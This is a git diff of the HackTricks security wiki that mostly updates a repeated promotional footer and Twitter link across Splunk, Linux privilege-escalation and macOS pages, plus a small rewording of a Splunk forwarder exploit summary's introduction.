+24,7 @@ In the first image below you can see how a Splunkd web page looks like. ## Splunk Universal Forwarder Agent Exploit Summary -**For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)** +For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary: **Exploit Overview:** An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network. @@ -71,7 +71,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index cdcf2bf34..5e1a783b1 100644 --- a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -53,7 +53,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index fbf049411..ab67eeb19 100644 --- a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -96,7 +96,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md index e6525ea6d..6088d573f 100644 --- a/linux-hardening/privilege-escalation/write-to-root.md +++ b/linux-hardening/privilege-escalation/write-to-root.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -58,7 +58,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 94cbd7e8f..55985a1fd 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -147,7 +147,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md index b08ba990e..769a50fc6 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -358,7 +358,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md index 632605e64..c3a0a3543 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -190,7 +190,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md index e1612a369..ad67422c2 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -416,7 +416,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md index 79c9f1daa..e3148d62a 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -456,7 +456,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index 78ca3c59a..8d1b15655 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -119,7 +119,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md index ac8dd2976..f70990d83 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -305,7 +305,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index 88c3287ff..05fdc2190 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -146,7 +146,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index 23aae16b8..b415d126f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord 